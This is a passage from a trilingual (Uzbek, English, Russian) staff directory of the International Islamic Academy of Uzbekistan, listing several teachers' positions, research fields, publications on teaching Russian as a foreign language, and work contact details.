3. Использование метода опорной технологии в обучении русскому языку студентов узбекских групп гуманитарных направлений. Вестник Национального университета Узбекистана, [1/6/2] ISSN 2181-7324. 2021 №6 72-74.

4. О методе опорных технологий обучения на занятиях по русскому язку в ВУЗах. Научный вестник Наманганского Государственного университета. 2021. №12. 578-582

5. Пути совершенствования лингвистической компетенции в обучении русскому языку как иностранному. PEDAGOGIK MAHORAT Ilmiy-nazariy va metodik jurnal Бухоро. 2022. № 2, 35-39.

6. Пути интенсификации обучения русскому языку как иностранному в современной лингводидактической парадигме». PEDAGOGIK MAHORAT Ilmiy-nazariy va metodik jurnal Бухоро. 2023 № 1. 259-263.

7 . Изучение опыта преподавателей по применению опорной технологии в совершенство-вании лингвисти-ческой компетенции по русскому языку у студентов неязыковых ВУЗов Узбекистана. Научный вестник Наманганского Государственного университета. Наманган 2023. №6 551-558.

II бўлим (II чaсть; II part) Xoрижий OAK нашрлари

8. Перспективы использования проектной методики при проведении внеаудиторных мероприятий по русскому языку со студентами ВУЗов. EGE UNIVERSITETI.Kardas Edebiyatlar.ISSN 1300-9214.Туркия, Izmir 2019, № 165.184-187

9. Effective teaching methods in teaching English Métodos de enseñanza efectivos en la enseñanza del ingles. RELIGACIÓN Revista de Ciencias Sociales y Humanidades Vol. 4 • ISSN 2477-9083. Septiembre 2019 Nº 19 770-772. (Соавторы:Adilova Sh. R. Tukhtakhodjaeva N. A. Aripova K. Y. Djumanova N.)

10. «Проблема интенсификации обучения русскому языку как иностранному в современной лингводидакти-ческой парадигме». European journal interdisciplinary Research and Development. www.ejird. Journalspark.org Volume 10. ISSN (E) 2720-5740 Polsha. Декабрь 2022. № 2 301-310.

11. THE PROBLEM OF INTENSIFICATION OF TEACHING RUSSIAN AS A FOREIGN LANGUAGE IN THE MODERN LINGUODIDACTIC PARADIGM. International Journal of Pedagogics (ISSN – 2771-2281) VOLUME 03 ISSUE Pages:11-20 SJIF IMPACT FACTOR. USA. 03 2023. 11-20.

12. “Intensive Methods of Improving Linguistic Competence in the Russian Language of Students of Non-Linguistic Higher Education Institutions in Uzbekistan” Journal of Survey in Fisheries Sciences 10(2S)DOI: https://doi.org/10.17762/sfs.v10i2S.1589 WEB OF SCIENCE3518-3528. (соавторы : Djumaeva N. I., Chinieva S. A. Isamova P. Sh.)

III бўлим (III чaсть; III part) Xoрижий мақолалар

13. Современные технологии обучения как способ социализации современной молодежи. INTERNATIONAL SCIENTIFIC JOURNAL «GLOBAL SCIENCE AND INNOVATIONS 2020: CENTRAL ASIA». NUR-SULTAN, KAZAKHSTAN, 2020 №4.

14. Роль метода опорных технологий обучения на занятиях по русскому языку в развитии личностных качеств студентов. Международный научный журнал «Ученый XXI века» ISSN2410-3586 http: // www.uch21vek.com • 2021 • № 8 (79) 62-66.

15. Значение опорных технологий обучения русскому языку в группах с узбекским языком обучения. Международный сборник научных статей «Содружество языков – содружество культур» Совместный проект Наманганского государственного университета и Российского государственного педагогического университета им. А. И. Герцена 20-21 май 2021. Наманган 227-231.

16. Теория и практика использования опорной технологии в совершенст-вовании лингвистической компетенции по русскому языку у студентов неязыковых ВУЗов. INTERNATIONAL SCIENTIFIC JOURNAL «GLOBAL SCIENCE AND INNOVATIONS 2022: CENTRAL ASIA» ASTANA, KAZAKHSTAN, Декабрь 2022№ 4(18). 3-7.

 

IV бўлим (IV чaсть; IV part) Махаллий тезислар.

17. Значение лексической работы на занятиях русского языка в неязыковых вузах. Замонавий тилшунослик ва деривацион қонуниятлар. Республика илмий-услубий конференцияси материаллари тўплами.2017 йил.24-ноябрь,Самарқанд. 103-106.

18. Система упражнений для расширения словарного запаса студентов Исламского университета. Замонавий тилшунослик ва деривацион қонуниятлар. Республика илмий-услубий конференцияси материаллари тўплами. 017 йил.24-ноябрь,Самарқанд.124-126

19. Чем должен владеть учитель, чтобы быть хорошим современным педагогом. Таълим,фан ва ишлаб чиқариш интеграциясида интеллектуал салоҳиятли ёшлар – мамлакат тараққиётининг муҳим омили. Самарқанд давлат архитектура қурилиш институти. Республика илмий-услубий конференция материаллари. 2018. 25-26- октябрь,Самарқанд 4-6.

20. Пути и средства повышения качества образования в ВУЗах. Сб. материалов Республиканской научно-практической конференции. “Олий таълим: муаммо ва ечимлар”. ТГЭУ25-май 2020. Тошкент.89-92

21. РОЛЬ ОПОРНОЙ ТЕХНОЛОГИИ В СОВЕРШЕНСТВОВАНИИ ЛИНГВИСТИЧЕСКОЙ КОМПЕТЕНЦИИ ПО РУССКОМУ ЯЗЫКУ У СТУДЕНТОВ НЕЯЗЫКОВЫХ ВУЗОВ. XORIJIY TILLARNI O‘QITISHDA INNOVATSION TEXNOLOGIYALARDAN FOYDALANISH METODOLOGIYASINING AHAMIYATI. Respublika ilmiy-amaliy konferensiyasi 16-may 2022-yil Toshkent 97-101. (Соавтор: Бахрамов Абдураззок)

22. NOLIGVISTIK OLIY TA’LIM MUASSASALARI TALABLARI-NING RUS TILIDAN LINGVISTIK KOMPETENTSIYASINI TAKOMILLASHTIRISHDA TAYANCH TEXNOLOGIYALARNING O‘RNI. Rrespublika ilmiy-amaliy anjumani «O‘ZBEK TILSHUNOSLIGINING ZAMONAVIY YO‘NALISHLARI: MUAMMO VA YECHIMLAR» 29 октябрь 2022. Тошкент 83-86 (Соавтор: Bektosheva Farangiz)

23. Использование схем, таблиц и графических моделей в качестве опорных технологий в обучении русскому языку как иностранному. Сборник материалов Ташкентского Международного педагогического форума «Образование: взгляд в будущее» (TIPF 2023). 2023. 04. Тошкент. 26-31

V бўлим (V чaсть; V part) Халқаро тезислар.

24. Интерактивные методы обучения на уроках по русскому языку в ВУЗах - как способ повышения мотивационно-познавательной сферы студентов. Материалы научно-практической конференции "Тенденции и перспективы развития науки и образования в условиях глобализации ". confscientific. Webnode.com.ua.УДК 001+37(100) ББК72.4+74.0 Т 33 . Вып 51.28-сентябрь. 2019. Украина.146-148.

25. Роль интерактивных методов в развитии личностной готовности студентов к построению успешной профессиональной карьеры. Сб. материалов Международной научно-практической конференции. НИИ им. Кары-Ниязи “Андрияновские педагогические чтения” 28 августа 2020г. 548-554.

26. Применение опорной технологии в совершенствовании лингвистической компетенции по русскому языку у студентов неязыковых ВУЗов. Сб. материалов Международной научно-практической конференции. «Традиции инновации в изучении и преподавании языков» Педагогический институт Термезского Государственного университета.25-26 март 2022, Термез 585-590.

27. Психолого-педагогический аспект использования опорной технологии при обучении русскому языку как иностранному. Сборник материалов Межвузовской научно-практической конференции В 2-х ч. –Ч.1 Теоретическая и прикладная лингвистика. Образовательные технологии в преподавании ино-странного языка.–М: ФГБОУ ВО «РГУ им. А.Н. Косыгина»,22-26 октября 2022г. Москва.98-106

VI бўлим (VI чaсть; VI part) Ўқув қўлланмалар

28. Джалалова С.М. Учебное пособие для вторых курсов по русской литературе (для учащихся лицеев). UDK:187.(32+17) КВК: 73.05(У) Т 19. ISBN: 978-9943-56-330-8 Т: «Navro’z» 2019соавтор: Мусаджанова Г.М.

29. Джалалова С.М. Учебное пособие для студентов 1 курса групп с узбекским языком обучения направления «Экономика зарубежных стран и страноведение (мусульманские страны)» Свидетельство Министерства Высшего образования № 522 От «06»октября 2020г.

30. Джалалова С.М. “Русский язык по специальности” Учебное пособие для студентов 1 курса групп с узбекским языком обучения направления «Психология (социопсихология религии) 60310900» Свидетельство Министерства Высшего образования, науки и инноваций № 68, от 27 марта 2023. (соавтор: Исамова П.Ш.)

Ilmiy ishlari havolasi: https://scholar.google.com/citations?hl=ru&user=uVG1uMUAAAAJ&view_

Elektron manzili:sayyoradjalalova16@gmail.com

Ishxona telefon raqami: +998 71 244 95 98 

INGLIZ TILIDA

Full Name: Jalalova Sayyora Mirkhaydarovna

Academic degree: senior lecturer at the International Islamic

Academy of Uzbekistan. 

Research fields: Russian language teaching methodology

 

Foreign language skills: Russian and English (using a dictionary).

Main scientific works: 

I бўлим (I чaсть; I part) Махаллий ОАК нашрлари

1. Джалалова С.М. «Взаимодействие студента и преподавателя как основа филологического образования». Xorijiy filologiya (Тil. Adabiyot. Ta’lim) Samarqand. 4/1 (69) 2017. (104-108)

2. Учебный перевод фразеологизмов как методический прием на занятиях русского языка. Сўз санъати халқаро журнали ISSN 2181-9297 Doi Journal 10.26739/2181-9297. Т. 2019йил. № 6. 108-113.

3. Использование метода опорной технологии в обучении русскому языку студентов узбекских групп гуманитарных направлений. Вестник Национального университета Узбекистана, [1/6/2] ISSN 2181-7324. 2021 №6 72-74.

4. О методе опорных технологий обучения на занятиях по русскому язку в ВУЗах. Научный вестник Наманганского Государственного университета. 2021. №12. 578-582

5. Пути совершенствования лингвистической компетенции в обучении русскому языку как иностранному. PEDAGOGIK MAHORAT Ilmiy-nazariy va metodik jurnal Бухоро. 2022. № 2, 35-39.

6. Пути интенсификации обучения русскому языку как иностранному в современной лингводидактической парадигме». PEDAGOGIK MAHORAT Ilmiy-nazariy va metodik jurnal Бухоро. 2023 № 1. 259-263.

7 . Изучение опыта преподавателей по применению опорной технологии в совершенство-вании лингвисти-ческой компетенции по русскому языку у студентов неязыковых ВУЗов Узбекистана. Научный вестник Наманганского Государственного университета. Наманган 2023. №6 551-558.

 

II бўлим (II чaсть; II part) Xoрижий OAK нашрлари

8. Перспективы использования проектной методики при проведении внеаудиторных мероприятий по русскому языку со студентами ВУЗов. EGE UNIVERSITETI.Kardas Edebiyatlar.ISSN 1300-9214.Туркия, Izmir 2019, № 165.184-187

9. Effective teaching methods in teaching English Métodos de enseñanza efectivos en la enseñanza del ingles. RELIGACIÓN Revista de Ciencias Sociales y Humanidades Vol. 4 • ISSN 2477-9083. Septiembre 2019 Nº 19 770-772. (Соавторы:Adilova Sh. R. Tukhtakhodjaeva N. A. Aripova K. Y. Djumanova N.)

10. «Проблема интенсификации обучения русскому языку как иностранному в современной лингводидакти-ческой парадигме». European journal interdisciplinary Research and Development. www.ejird. Journalspark.org Volume 10. ISSN (E) 2720-5740 Polsha. Декабрь 2022. № 2 301-310.

11. THE PROBLEM OF INTENSIFICATION OF TEACHING RUSSIAN AS A FOREIGN LANGUAGE IN THE MODERN LINGUODIDACTIC PARADIGM. International Journal of Pedagogics (ISSN – 2771-2281) VOLUME 03 ISSUE Pages:11-20 SJIF IMPACT FACTOR. USA. 03 2023. 11-20.

12. “Intensive Methods of Improving Linguistic Competence in the Russian Language of Students of Non-Linguistic Higher Education Institutions in Uzbekistan” Journal of Survey in Fisheries Sciences 10(2S)DOI: https://doi.org/10.17762/sfs.v10i2S.1589 WEB OF SCIENCE3518-3528. (соавторы : Djumaeva N. I., Chinieva S. A. Isamova P. Sh.)

III бўлим (III чaсть; III part) Xoрижий мақолалар

13. Современные технологии обучения как способ социализации современной молодежи. INTERNATIONAL SCIENTIFIC JOURNAL «GLOBAL SCIENCE AND INNOVATIONS 2020: CENTRAL ASIA». NUR-SULTAN, KAZAKHSTAN, 2020 №4.

14. Роль метода опорных технологий обучения на занятиях по русскому языку в развитии личностных качеств студентов. Международный научный журнал «Ученый XXI века» ISSN2410-3586 http: // www.uch21vek.com • 2021 • № 8 (79) 62-66.

15. Значение опорных технологий обучения русскому языку в группах с узбекским языком обучения. Международный сборник научных статей «Содружество языков – содружество культур» Совместный проект Наманганского государственного университета и Российского государственного педагогического университета им. А. И. Герцена 20-21 май 2021. Наманган 227-231.

16. Теория и практика использования опорной технологии в совершенст-вовании лингвистической компетенции по русскому языку у студентов неязыковых ВУЗов. INTERNATIONAL SCIENTIFIC JOURNAL «GLOBAL SCIENCE AND INNOVATIONS 2022: CENTRAL ASIA» ASTANA, KAZAKHSTAN, Декабрь 2022№ 4(18). 3-7.

 IV бўлим (IV чaсть; IV part) Махаллий тезислар.

17. Значение лексической работы на занятиях русского языка в неязыковых вузах. Замонавий тилшунослик ва деривацион қонуниятлар. Республика илмий-услубий конференцияси материаллари тўплами.2017 йил.24-ноябрь,Самарқанд. 103-106.

18. Система упражнений для расширения словарного запаса студентов Исламского университета. Замонавий тилшунослик ва деривацион қонуниятлар. Республика илмий-услубий конференцияси материаллари тўплами. 017 йил.24-ноябрь,Самарқанд.124-126

19. Чем должен владеть учитель, чтобы быть хорошим современным педагогом. Таълим,фан ва ишлаб чиқариш интеграциясида интеллектуал салоҳиятли ёшлар – мамлакат тараққиётининг муҳим омили. Самарқанд давлат архитектура қурилиш институти. Республика илмий-услубий конференция материаллари. 2018. 25-26- октябрь,Самарқанд 4-6.

20. Пути и средства повышения качества образования в ВУЗах. Сб. материалов Республиканской научно-практической конференции. “Олий таълим: муаммо ва ечимлар”. ТГЭУ25-май 2020. Тошкент.89-92

21. РОЛЬ ОПОРНОЙ ТЕХНОЛОГИИ В СОВЕРШЕНСТВОВАНИИ ЛИНГВИСТИЧЕСКОЙ КОМПЕТЕНЦИИ ПО РУССКОМУ ЯЗЫКУ У СТУДЕНТОВ НЕЯЗЫКОВЫХ ВУЗОВ. XORIJIY TILLARNI O‘QITISHDA INNOVATSION TEXNOLOGIYALARDAN FOYDALANISH METODOLOGIYASINING AHAMIYATI. Respublika ilmiy-amaliy konferensiyasi 16-may 2022-yil Toshkent 97-101. (Соавтор: Бахрамов Абдураззок)

22. NOLIGVISTIK OLIY TA’LIM MUASSASALARI TALABLARI-NING RUS TILIDAN LINGVISTIK KOMPETENTSIYASINI TAKOMILLASHTIRISHDA TAYANCH TEXNOLOGIYALARNING O‘RNI. Rrespublika ilmiy-amaliy anjumani «O‘ZBEK TILSHUNOSLIGINING ZAMONAVIY YO‘NALISHLARI: MUAMMO VA YECHIMLAR» 29 октябрь 2022. Тошкент 83-86 (Соавтор: Bektosheva Farangiz)

23. Использование схем, таблиц и графических моделей в качестве опорных технологий в обучении русскому языку как иностранному. Сборник материалов Ташкентского Международного педагогического форума «Образование: взгляд в будущее» (TIPF 2023). 2023. 04. Тошкент. 26-31

V бўлим (V чaсть; V part) Халқаро тезислар.

24. Интерактивные методы обучения на уроках по русскому языку в ВУЗах - как способ повышения мотивационно-познавательной сферы студентов. Материалы научно-практической конференции "Тенденции и перспективы развития науки и образования в условиях глобализации ". confscientific. Webnode.com.ua.УДК 001+37(100) ББК72.4+74.0 Т 33 . Вып 51.28-сентябрь. 2019. Украина.146-148.

25. Роль интерактивных методов в развитии личностной готовности студентов к построению успешной профессиональной карьеры. Сб. материалов Международной научно-практической конференции. НИИ им. Кары-Ниязи “Андрияновские педагогические чтения” 28 августа 2020г. 548-554.

26. Применение опорной технологии в совершенствовании лингвистической компетенции по русскому языку у студентов неязыковых ВУЗов. Сб. материалов Международной научно-практической конференции. «Традиции инновации в изучении и преподавании языков» Педагогический институт Термезского Государственного университета.25-26 март 2022, Термез 585-590.

27. Психолого-педагогический аспект использования опорной технологии при обучении русскому языку как иностранному. Сборник материалов Межвузовской научно-практической конференции В 2-х ч. –Ч.1 Теоретическая и прикладная лингвистика. Образовательные технологии в преподавании ино-странного языка.–М: ФГБОУ ВО «РГУ им. А.Н. Косыгина»,22-26 октября 2022г. Москва.98-106

 VI бўлим (VI чaсть; VI part) Ўқув қўлланмалар

28. Джалалова С.М. Учебное пособие для вторых курсов по русской литературе (для учащихся лицеев). UDK:187.(32+17) КВК: 73.05(У) Т 19. ISBN: 978-9943-56-330-8 Т: «Navro’z» 2019соавтор: Мусаджанова Г.М.

29. Джалалова С.М. Учебное пособие для студентов 1 курса групп с узбекским языком обучения направления «Экономика зарубежных стран и страноведение (мусульманские страны)» Свидетельство Министерства Высшего образования № 522 От «06»октября 2020г.

30. Джалалова С.М. “Русский язык по специальности” Учебное пособие для студентов 1 курса групп с узбекским языком обучения направления «Психология (социопсихология религии) 60310900» Свидетельство Министерства Высшего образования, науки и инноваций № 68, от 27 марта 2023. (соавтор: Исамова П.Ш.)

Research papers link:

https://scholar.google.com/citations?hl=ru&user=uVG1uMUAAAAJ&view_

Email addresssayyoradjalalova16@gmail.com

Office phone number: +998 71 244 95 98

RUS TILIDA

ФИО: Джалалова Сайёра Мирхайдаровна

Место работы:  старший преподаватель  Международной исламской академии Узбекистана.

Области научных исследований: методика преподавания русского языка

Знание иностранных языков: русский и английский  язык  (со словарём).

Основные научные издания: 

I бўлим (I чaсть; I part) Махаллий ОАК нашрлари

1. Джалалова С.М. «Взаимодействие студента и преподавателя как основа филологического образования». Xorijiy filologiya (Тil. Adabiyot. Ta’lim) Samarqand. 4/1 (69) 2017. (104-108)

2. Учебный перевод фразеологизмов как методический прием на занятиях русского языка. Сўз санъати халқаро журнали ISSN 2181-9297 Doi Journal 10.26739/2181-9297. Т. 2019йил. № 6. 108-113.

3. Использование метода опорной технологии в обучении русскому языку студентов узбекских групп гуманитарных направлений. Вестник Национального университета Узбекистана, [1/6/2] ISSN 2181-7324. 2021 №6 72-74.

4. О методе опорных технологий обучения на занятиях по русскому язку в ВУЗах. Научный вестник Наманганского Государственного университета. 2021. №12. 578-582

5. Пути совершенствования лингвистической компетенции в обучении русскому языку как иностранному. PEDAGOGIK MAHORAT Ilmiy-nazariy va metodik jurnal Бухоро. 2022. № 2, 35-39.

6. Пути интенсификации обучения русскому языку как иностранному в современной лингводидактической парадигме». PEDAGOGIK MAHORAT Ilmiy-nazariy va metodik jurnal Бухоро. 2023 № 1. 259-263.

7 . Изучение опыта преподавателей по применению опорной технологии в совершенство-вании лингвисти-ческой компетенции по русскому языку у студентов неязыковых ВУЗов Узбекистана. Научный вестник Наманганского Государственного университета. Наманган 2023. №6 551-558.

II бўлим (II чaсть; II part) Xoрижий OAK нашрлари

8. Перспективы использования проектной методики при проведении внеаудиторных мероприятий по русскому языку со студентами ВУЗов. EGE UNIVERSITETI.Kardas Edebiyatlar.ISSN 1300-9214.Туркия, Izmir 2019, № 165.184-187

9. Effective teaching methods in teaching English Métodos de enseñanza efectivos en la enseñanza del ingles. RELIGACIÓN Revista de Ciencias Sociales y Humanidades Vol. 4 • ISSN 2477-9083. Septiembre 2019 Nº 19 770-772. (Соавторы:Adilova Sh. R. Tukhtakhodjaeva N. A. Aripova K. Y. Djumanova N.)

10. «Проблема интенсификации обучения русскому языку как иностранному в современной лингводидакти-ческой парадигме». European journal interdisciplinary Research and Development. www.ejird. Journalspark.org Volume 10. ISSN (E) 2720-5740 Polsha. Декабрь 2022. № 2 301-310.

11. THE PROBLEM OF INTENSIFICATION OF TEACHING RUSSIAN AS A FOREIGN LANGUAGE IN THE MODERN LINGUODIDACTIC PARADIGM. International Journal of Pedagogics (ISSN – 2771-2281) VOLUME 03 ISSUE Pages:11-20 SJIF IMPACT FACTOR. USA. 03 2023. 11-20.

12. “Intensive Methods of Improving Linguistic Competence in the Russian Language of Students of Non-Linguistic Higher Education Institutions in Uzbekistan” Journal of Survey in Fisheries Sciences 10(2S)DOI: https://doi.org/10.17762/sfs.v10i2S.1589 WEB OF SCIENCE3518-3528. (соавторы : Djumaeva N. I., Chinieva S. A. Isamova P. Sh.)

III бўлим (III чaсть; III part) Xoрижий мақолалар

13. Современные технологии обучения как способ социализации современной молодежи. INTERNATIONAL SCIENTIFIC JOURNAL «GLOBAL SCIENCE AND INNOVATIONS 2020: CENTRAL ASIA». NUR-SULTAN, KAZAKHSTAN, 2020 №4.

14. Роль метода опорных технологий обучения на занятиях по русскому языку в развитии личностных качеств студентов. Международный научный журнал «Ученый XXI века» ISSN2410-3586 http: // www.uch21vek.com • 2021 • № 8 (79) 62-66.

15. Значение опорных технологий обучения русскому языку в группах с узбекским языком обучения. Международный сборник научных статей «Содружество языков – содружество культур» Совместный проект Наманганского государственного университета и Российского государственного педагогического университета им. А. И. Герцена 20-21 май 2021. Наманган 227-231.

16. Теория и практика использования опорной технологии в совершенст-вовании лингвистической компетенции по русскому языку у студентов неязыковых ВУЗов. INTERNATIONAL SCIENTIFIC JOURNAL «GLOBAL SCIENCE AND INNOVATIONS 2022: CENTRAL ASIA» ASTANA, KAZAKHSTAN, Декабрь 2022№ 4(18). 3-7.

IV бўлим (IV чaсть; IV part) Махаллий тезислар.

17. Значение лексической работы на занятиях русского языка в неязыковых вузах. Замонавий тилшунослик ва деривацион қонуниятлар. Республика илмий-услубий конференцияси материаллари тўплами.2017 йил.24-ноябрь,Самарқанд. 103-106.

18. Система упражнений для расширения словарного запаса студентов Исламского университета. Замонавий тилшунослик ва деривацион қонуниятлар. Республика илмий-услубий конференцияси материаллари тўплами. 017 йил.24-ноябрь,Самарқанд.124-126

19. Чем должен владеть учитель, чтобы быть хорошим современным педагогом. Таълим,фан ва ишлаб чиқариш интеграциясида интеллектуал салоҳиятли ёшлар – мамлакат тараққиётининг муҳим омили. Самарқанд давлат архитектура қурилиш институти. Республика илмий-услубий конференция материаллари. 2018. 25-26- октябрь,Самарқанд 4-6.

20. Пути и средства повышения качества образования в ВУЗах. Сб. материалов Республиканской научно-практической конференции. “Олий таълим: муаммо ва ечимлар”. ТГЭУ25-май 2020. Тошкент.89-92

21. РОЛЬ ОПОРНОЙ ТЕХНОЛОГИИ В СОВЕРШЕНСТВОВАНИИ ЛИНГВИСТИЧЕСКОЙ КОМПЕТЕНЦИИ ПО РУССКОМУ ЯЗЫКУ У СТУДЕНТОВ НЕЯЗЫКОВЫХ ВУЗОВ. XORIJIY TILLARNI O‘QITISHDA INNOVATSION TEXNOLOGIYALARDAN FOYDALANISH METODOLOGIYASINING AHAMIYATI. Respublika ilmiy-amaliy konferensiyasi 16-may 2022-yil Toshkent 97-101. (Соавтор: Бахрамов Абдураззок)

22. NOLIGVISTIK OLIY TA’LIM MUASSASALARI TALABLARI-NING RUS TILIDAN LINGVISTIK KOMPETENTSIYASINI TAKOMILLASHTIRISHDA TAYANCH TEXNOLOGIYALARNING O‘RNI. Rrespublika ilmiy-amaliy anjumani «O‘ZBEK TILSHUNOSLIGINING ZAMONAVIY YO‘NALISHLARI: MUAMMO VA YECHIMLAR» 29 октябрь 2022. Тошкент 83-86 (Соавтор: Bektosheva Farangiz)

23. Использование схем, таблиц и графических моделей в качестве опорных технологий в обучении русскому языку как иностранному. Сборник материалов Ташкентского Международного педагогического форума «Образование: взгляд в будущее» (TIPF 2023). 2023. 04. Тошкент. 26-31

V бўлим (V чaсть; V part) Халқаро тезислар.

24. Интерактивные методы обучения на уроках по русскому языку в ВУЗах - как способ повышения мотивационно-познавательной сферы студентов. Материалы научно-практической конференции "Тенденции и перспективы развития науки и образования в условиях глобализации ". confscientific. Webnode.com.ua.УДК 001+37(100) ББК72.4+74.0 Т 33 . Вып 51.28-сентябрь. 2019. Украина.146-148.

25. Роль интерактивных методов в развитии личностной готовности студентов к построению успешной профессиональной карьеры. Сб. материалов Международной научно-практической конференции. НИИ им. Кары-Ниязи “Андрияновские педагогические чтения” 28 августа 2020г. 548-554.

26. Применение опорной технологии в совершенствовании лингвистической компетенции по русскому языку у студентов неязыковых ВУЗов. Сб. материалов Международной научно-практической конференции. «Традиции инновации в изучении и преподавании языков» Педагогический институт Термезского Государственного университета.25-26 март 2022, Термез 585-590.

27. Психолого-педагогический аспект использования опорной технологии при обучении русскому языку как иностранному. Сборник материалов Межвузовской научно-практической конференции В 2-х ч. –Ч.1 Теоретическая и прикладная лингвистика. Образовательные технологии в преподавании ино-странного языка.–М: ФГБОУ ВО «РГУ им. А.Н. Косыгина»,22-26 октября 2022г. Москва.98-106

 VI бўлим (VI чaсть; VI part) Ўқув қўлланмалар

28. Джалалова С.М. Учебное пособие для вторых курсов по русской литературе (для учащихся лицеев). UDK:187.(32+17) КВК: 73.05(У) Т 19. ISBN: 978-9943-56-330-8 Т: «Navro’z» 2019соавтор: Мусаджанова Г.М.

29. Джалалова С.М. Учебное пособие для студентов 1 курса групп с узбекским языком обучения направления «Экономика зарубежных стран и страноведение (мусульманские страны)» Свидетельство Министерства Высшего образования № 522 От «06»октября 2020г.

30. Джалалова С.М. “Русский язык по специальности” Учебное пособие для студентов 1 курса групп с узбекским языком обучения направления «Психология (социопсихология религии) 60310900» Свидетельство Министерства Высшего образования, науки и инноваций № 68, от 27 марта 2023. (соавтор: Исамова П.Ш.)

Ссылка на научные работы: https://scholar.google.com/citations?hl=ru&user=uVG1uMUAAAAJ&view_

Адрес электронной почты: sayyoradjalalova16@gmail.com

Номер служеебного телефона: +998 71 244 95 98

O‘ZBEK TILIDA

F.I.SH.: Myakota Veronika Viktorovna

Ish joyi: O‘zbekiston xalqaro islom akademiyasi “O‘zbek tili va mumtoz sharq adabiyoti” kafedrasi o‘qituvchisi.

Ilmiy darajasi: -

Ilmiy unvoni: -

Ilmiy tadqiqot yo‘nalishlari: Lingvistika, sotsiolingvistika,

psixolingvistika.

Chet tillarni bilishi: rus, ukrain, nemis tillari

Asosiy ilmiy ishlari: Когнитивная метафора в онтогенезе речи.

Ilmiy ishlari havolasi: ----

Elektron manzili: myakotanika9999@gmail.com

Ishxona telefon raqami: +99817 244 95 98  

INGLIZ TILIDA

Full name:  Myakota Veronika Viktorovna

Work place: teacher of the department "Uzbek language and classical eastern literature" of the International Islamic Academy of Uzbekistan.

Academic Degree:-

Academic Title:-

Research fields: Linguistics, sociolinguistics, psycholinguistics.

Foreign language skills: Russian, Ukrainian, German

Main scientific works: Когнитивная метафора в онтогенезе речи.

Research papers link:

Email address: myakotanika9999@gmail.com

Office telephone number: +99817 244 95 98 

RUS TILIDA

ФИО: Мякота Вероника Викторовна

Должность: преподаватель кафедры «Узбекский язык и классическая восточная литература» Международной исламской академии Узбекистана

Ученая степень: --

Ученое звание: --

Область научных исследований: Лингвистика, социолингвистика, психолингвистика.

Знание иностранных языков: русский, украинский, немецкий.

Ссылка на научные работы: ----

Адрес электронной почты: myakotanika9999@gmail.com

Рабочий телефон: +998 71 244 95 98

O‘ZBEK TILIDA

F.I.SH.: Djumayeva Nargiz Irkinovna

Ish joyi: O‘zbekiston xalqaro islom akademiyasi “O’zbek tili va mumtoz sharq adabiyoti” kafedrasi dotsenti

Ilmiy darajasi: pedagogika fanlari nomzodi

Ilmiy unvoni: dotsent

Ilmiy tadqiqot yo‘nalishlari: ta’lim-tarbiya masalalari, rus tili mashg’ulotlarida interfaol metodlardan unumli foydalanish, pedagogika

Chet tillarni bilishi: rus va ingliz tillari

Asosiy ilmiy ishlari:

-Таълимни инсонпарварлаштиришда ўқитиш тамойиллари ва методларининг ўзаро алоқадорлиги. Ўқув қўлланма. –Тошкент, ЎзР ФА «Фан» нашриёти, 2006.

-Ижтимоий-гуманитар фанларни ўқитишда замонавий технологиялардан фойдаланиш. Услубий қўлланма. –Тошкент, ЎзР ФА «Фан» нашриёти, 2007.

-Методические указания по педагогической практике для студентов 3-4 курсов университета. Учебно-методическое пособие. –Карши, 2012.

-Педагогические термины и понятия. Терминологический словарь. Карши, 2014. -135 стр.

-Русский язык. Учебное пособие. Международная исламская академия Узбекистана. Ташкент, 2020. С.110

-Академический русский язык. Учебник. Международная исламская академия Узбекистана. Ташкент, 2022. С.250

-Русский язык по специальности. Учебное пособие. Международная исламская академия Узбекистана, Ташкент, 2023. С.154

-Effective teaching methods in teaching English. Журнал Métodos de enseñanza efectivos en la enseñanza del inglés. RELIGACIÓN Revista de Ciencias Sociales y Humanidades. Vol 4 • Nº 19 • Quito • Trimestral • Septiembre 2019. С.770-772

-Воспитание самостоятельности студентов в условиях внедрения модульной системы образования. MONOGRAFIA POKONFERENCYJNA. SCIENCE, RESEARCH, DEVELOPMENT #22. PHILOLOGY, SOCIOLOGY AND CULTUROLOGY. London, 2019, 30-31 октябрь, С.53-56

-Преимущества и проблемы дистанционного обучения в Узбекистане. //

Ж. Наука и образование сегодня. Москва, 2022, №5 (74). С.4-9

-Вопросы компетенции и креативности педагога в образовательном процессе. // Ж. Педагогик маҳорат. Бухоро, 2023, №4. Б. 102-107

Ilmiy ishlari havolasi: -----

Elektron manzili: djumayevanargiz2013@mail.ru

Ishxona telefon raqami: +998 91 211 54 00 (моб.) 

INGLIZ TILIDA

Full name: Dzhumaeva Nargiz Irkinovna

Academic degree: Candidate of Pedagogical Sciences

Academic title: associate professor

Areas of scientific research: issues of training and education, effective use of interactive methods in Russian language lessons, pedagogy

Knowledge of foreign languages: Russian and English

Main scientific works:

-Таълимни инсонпарварлаштиришда ўқитиш тамойиллари ва методларининг ўзаро алоқадорлиги. Ўқув қўлланма. –Тошкент, ЎзР ФА «Фан» нашриёти, 2006.

-Ижтимоий-гуманитар фанларни ўқитишда замонавий технологиялардан фойдаланиш. Услубий қўлланма. –Тошкент, ЎзР ФА «Фан» нашриёти, 2007.

-Методические указания по педагогической практике для студентов 3-4 курсов университета. Учебно-методическое пособие. –Карши, 2012.

-Педагогические термины и понятия. Терминологический словарь. Карши, 2014. -135 стр.

-Русский язык. Учебное пособие. Международная исламская академия Узбекистана. Ташкент, 2020. С.110

-Академический русский язык. Учебник. Международная исламская академия Узбекистана. Ташкент, 2022. С.250

-Русский язык по специальности. Учебное пособие. Международная исламская академия Узбекистана, Ташкент, 2023. С.154

-Effective teaching methods in teaching English. Журнал Métodos de enseñanza efectivos en la enseñanza del inglés. RELIGACIÓN Revista de Ciencias Sociales y Humanidades. Vol 4 • Nº 19 • Quito • Trimestral • Septiembre 2019. С.770-772

-Воспитание самостоятельности студентов в условиях внедрения модульной системы образования. MONOGRAFIA POKONFERENCYJNA. SCIENCE, RESEARCH, DEVELOPMENT #22. PHILOLOGY, SOCIOLOGY AND CULTUROLOGY. London, 2019, 30-31 октябрь, С.53-56

-Преимущества и проблемы дистанционного обучения в Узбекистане. //

- Ж. Наука и образование сегодня. Москва, 2022, №5 (74). С.4-9

-Вопросы компетенции и креативности педагога в образовательном процессе. // Ж. Педагогик маҳорат. Бухоро, 2023, №4. Б. 102-107

Link to scientific works: -----

Email address: djumayevanargiz2013@mail.ru

Work phone: +998 91 211 54 00 (mobile)

RUS TILIDA

ФИО: Джумаева Наргиз Иркиновна

Ученая степень: кандидат педагогических наук

Ученое звание: доцент

